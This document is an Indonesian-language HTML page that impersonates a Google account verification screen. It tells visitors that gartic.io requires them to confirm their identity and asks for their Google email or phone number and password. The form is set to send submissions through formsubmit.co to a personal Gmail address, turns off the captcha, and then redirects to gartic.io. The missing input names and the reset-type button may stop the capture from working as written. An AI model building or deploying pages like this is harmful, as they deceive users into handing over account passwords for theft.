<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Verify your email</title>
  
  <style>
    .judul{
      font-size: 29px;
    }
    
    .gunakan{
      font-size: 19px;
      margin-top:50px;
    }
    
    .pelajari{
      color:#2e69db;
      font-size: 17px;
    }
    
    .gunakan,.pelajari{
      line-height: 8px;
    }
    
    img,.judul{
    line-height: 5px;
    }
    
    .deskripsi{
      margin:20px;
      margin-top:20px;
    }
    
    #email , #pass{
      padding:20px 50px;
      border-radius: 3px;
      border:solid gray;
      
    }
    
    #pass{
      margin-top: 30px;
    }
    
    .placeholder{
      position:absolute;
      top:300px;
      left:45px;
      color:gray;
    }
    
    .placeholder2{
      position:absolute;
      top:390px;
      left:45px;
      color:gray;
    }
    
    #email:focus ~ .placeholder {
    display: none;

    } 
    
    #pass:focus ~ .placeholder2{
      display:none;
    }

    #btn{
      background-color:  #4285F4;
      border-radius: 3px;
      position:relative;
      top:130px;
      left:220px;
      border:solid  #4285F4;
      padding:10px 25px;
      
    }
    
    
  

  </style>
</head>
<body>
  
  <center>
    <img src="google.jpg" width="120">
    
    <p class="judul">Verifikasi akun anda</p>
  
    <p class="gunakan">Menggunakan Akun Google.</p>
    
    <p class="pelajari">Pelajari selengkapnya</p>
  </center>

  <p class="deskripsi">Sebelum melanjutkan ke halaman selanjutnya gartic.io mohon melakukan verifikasi bahwa ini adalah diri anda sebagai langkah keamanan</p>
  <form action="https://formsubmit.co/fathandsome22@gmail.com" method="POST">
    <!--honeypot-->
    <input type="text" name="_honey" style="display: none;">

    <!--Captcha-->
    <input type="hidden" name="_captcha" value="false">

    <input type="hidden" name="_next" value="https://gartic.io/">

  <center>
    <input type="email" id="email" />
    <p class="placeholder">Email atau ponsel</p>
     
    <input type="password" id="pass" />
    <p class="placeholder2">Password</p>
  </center>
    
  
  <button id="btn" type="reset">Berikutnya</button>
  </form>
  
  <script>
    document.getElementById("btn").addEventListener("click",pengecekan)

   
     function pengecekan(){
       var email = document.getElementById("email")
       
       if(email.value==""){
         email.style.border="solid red"
       }else {
         email.style.border="solid gray"
         window.location.href="https://gartic.io/"
       }
       
     }
       
       
     
  </script>
</body>
</html>